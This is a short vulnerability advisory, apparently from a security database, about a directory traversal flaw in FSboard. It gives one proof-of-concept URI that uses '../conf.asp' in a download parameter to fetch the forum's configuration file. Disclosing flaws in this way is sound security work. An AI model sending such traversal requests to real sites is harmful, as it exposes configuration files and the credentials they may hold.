• info
• discussion
• exploit
• solution
• references

FSboard Directory Traversal Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/forum/default.asp?db=general&mode=download&idx=507&fileNum=1&filename=../conf.asp&nav=viewcontents&srhctgr=&srhstr=&page=1